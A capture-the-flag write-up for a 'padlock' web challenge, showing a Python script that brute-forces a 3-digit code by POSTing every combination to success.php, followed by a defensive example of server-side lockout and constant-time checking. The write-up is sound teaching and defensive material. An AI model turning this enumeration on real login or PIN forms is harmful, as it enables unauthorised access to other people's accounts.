write-ups-challenges-2019-2020/Padlock/writeup.md
2022-11-24 22:43:03 +01:00

CHALLENGE padlock

Writeup

To get the flag, a 3-digit code has to be found. As 3 digits only offer 999 combinations, brute force is the way to go. In the source code of index.php, we can see that each try sends a POST request to success.php. The POST request contains 3 values: try100, try10 and try1. For the brute force, we have to enumerate each value from 0 to 9. We can check each response for the flag by looking for "IG{". If we get a match, the response might contain a flag.

A simple brute-force program in Python would look like this:

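```python
import requests

# Change this to the full URL of the challenge's success.php
# (requests needs the scheme and host, not just the path).
url = "success.php"

def checkForSolution(text):
    # The flag format starts with "IG{"; print it if the response contains one.
    start = text.find("IG{")
    if start == -1:
        return False
    print(text[start:text.find("}", start) + 1])
    return True

def bruteForce():
    # Enumerate the hundreds (h), tens (t) and units (u) digits.
    for h in range(10):
        for t in range(10):
            for u in range(10):
                param = {'try100': h, 'try10': t, 'try1': u}
                req = requests.post(url, data=param)
                print("try:", h, t, u)
                if checkForSolution(req.text):
                    return True
    # No response contained a flag.
    return False

bruteForce()
```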
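The enumeration works because success.php accepts an unlimited number of tries. As an added example (not the challenge's code), here is a server-side check for the same three form fields with a per-client failure limit, replayed against the 000 to 999 enumeration. The class name, `client_id`, and the limit and window values are assumptions made for illustration.

```python
import hmac
import time

MAX_FAILURES = 5        # assumed policy: failed tries allowed per window
WINDOW_SECONDS = 900    # assumed policy: how long failures are remembered


class PadlockGuard:
    """Checks try100/try10/try1 and locks a client out after repeated failures."""

    def __init__(self, secret_code, clock=time.monotonic):
        self._secret = secret_code.encode()
        self._clock = clock
        self._failures = {}   # client id -> timestamps of recent failed tries

    def check(self, client_id, form):
        now = self._clock()
        # Forget failures that are older than the window.
        recent = [t for t in self._failures.get(client_id, [])
                  if now - t < WINDOW_SECONDS]
        self._failures[client_id] = recent
        if len(recent) >= MAX_FAILURES:
            return "locked"   # refuse before the code is even compared
        guess = "".join(str(form.get(k, "")) for k in ("try100", "try10", "try1"))
        # Constant-time comparison of the submitted digits with the secret.
        if hmac.compare_digest(guess.encode(), self._secret):
            self._failures.pop(client_id, None)
            return "ok"
        recent.append(now)
        return "wrong"


def simulate_enumeration(guard, client_id):
    """Replay the 000..999 enumeration and count each kind of response."""
    counts = {"ok": 0, "wrong": 0, "locked": 0}
    for n in range(1000):
        form = {"try100": n // 100, "try10": (n // 10) % 10, "try1": n % 10}
        counts[guard.check(client_id, form)] += 1
    return counts
```

With this check in place, a single client gets five wrong answers and then only lockout responses, so the flag never appears in the enumeration's output.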

Easter eggs

In robots.txt, a file flag.txt is disallowed; this file contains ASCII art of a beautiful flag. Trying combinations like '420' or '069' will redirect to a new page. A cookie is also placed, and as long as this cookie exists, the index page shows a 4-digit combination. However, this newly placed digit does not do anything. The cookie contains a Base64 string.